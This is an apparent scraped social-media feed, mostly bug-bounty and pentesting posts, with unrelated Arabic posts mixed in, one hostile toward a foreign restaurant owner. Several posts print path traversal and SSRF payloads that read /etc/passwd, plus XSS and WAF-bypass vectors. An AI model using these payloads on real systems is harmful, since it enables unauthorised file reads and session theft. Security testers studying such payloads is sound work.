L’Hex

not once but twice 😭

Dalfox v3 has been released🔥 I've been rewriting it in Rust since August last year, and it's finally done. The biggest change is the engine. v3 no longer depends on a headless browser like v2 did. Instead, it uses DOM/AST analysis to check whether an XSS finding is actually valid. Tested on xssmaze, various challenge sites, and real-world targets, it reduces false negatives and false positives more effectively while scanning faster than v2. github.com/hahwul/dalfox/…

Path Traversal Bypasses Null Byte Injection ../../../etc/./passwd%00.png Stripped Dot-Dot-Slash ..././..././..././e../tc..//pas../swd Multi-Stage Decoding ..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32Fpasswd Truncation Appending (4096 bytes) ../../../etc/./passwd/././././././

What did you learn from watching this video?

متى وقت الدعاء في يوم عرفة ؟

How hackers crack a zip file

WIFI Hacking - AirCrackNG #Educational purposes only

Learn Advanced Networking For educational purposes only.

@MouloudiaDZ3 اغلقله وعطيه بروسي وسفره لبلده،،،، في الخليج يترعدو ويحتارمو القانون والا الغلق والمخالفة والسجن وبعدها مباشرة التسفير والابعاد ولن يرى الخليج مجددا. صابو جزاير نية وناس ملاح وسايبة دارو رايهم

لحم “فايح” في مطعم لصاحبه سوري… وفوق هذا كله، يزيد يبرّر… #الجزائر

Discovers real IPs behind Cloudflare github.com/musana/CF-Hero

This video contains the main methodologies attackers use to hack Wordpress websites

What could they possibly be arguing about?

Abusing Printers to Compromise Active Directory In many organizations, sysadmins are only focused on servers and workstations. But printers sit on the same network. They are rarely monitored with the same level of attention as more "important" systems. Many of those printers store AD user credentials which can be extracted in plaintext to attack the DC. Even if the AD is well secured, these creds can be used to poison shares with LNK files. Even print jobs themselves can become a target especially when they contain confidential information. Unfortunaly, many of the IoT devices in the corporate environments are outdated and aren't taken seriously. We also mentioned how you can fix that. hackers-arise.com/iot-hacking-ab… @three_cube @_aircorridor #iot #pentesting

🐷 Secrets scanner with 800+ detectors for API keys, tokens, passwords, and leaked credentials. TruffleHog scans: • Git repositories & commit history • GitHub, GitLab, Docker & S3 • Filesystems, CI/CD, Postman & Jenkins • GCS, Elasticsearch & Hugging Face Features: • Live credential verification • Secret classification & analysis • Docker image and binary scanning • JSON, SARIF & GitHub Actions support • GitHub Action & pre-commit integration Built for security engineers, DevSecOps teams, and bug hunters. 🔗 github.com/trufflesecurit… #CyberSecurity #DevSecOps #SecretScanning #BugBounty #GitHub

Introducing Triage: automatically reproduces and validates complex vulnerabilities reported on HackerOne, Bugcrowd, and Claude Code.

Day 6 / 30 — GITHUB RECON THAT PAYS Devs still leak secrets in public repos. In 2026. Mine them. Tools: → trufflehog — github.com/trufflesecurit… → gitleaks` — github.com/gitleaks/gitle… → GitDorker — github.com/obheda12/GitDo… → github-subdomains — github.com/gwen001/github… → gitGraber — github.com/hisxo/gitGraber #bugbountytips #github #osint #bugbounty #infosec

SSRF Payloads for LFR/LFD file:/etc//passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/%3F/../passwd file:${br}/et${u}c%252Fpas${te}swd%3F/ file:$(br)/et$(u)c%252Fpas$(te)swd%3F/ SSRF POLYGLOT file:///etc/./passwd?/../passwd #CF403 rodoassis.medium.com/on-ssrf-server…

Boom 💣🔥 Payload: "><script>alert(document.cookie)<~2Fscript> #xss #bugbountytips #bugbounty

PHP Null Byte on Parameter Trick Use to fool WAFs that decode before parsing. It might consider the anchor with dangling (but harmless) markup instead of the real vector. param%00p%3D<A/Href="<Svg/OnLoad=alert(1)// More on brutelogic.net/brute-art-bypa… PoC gym.brutelogic.net/?p05%00p%3D%3C…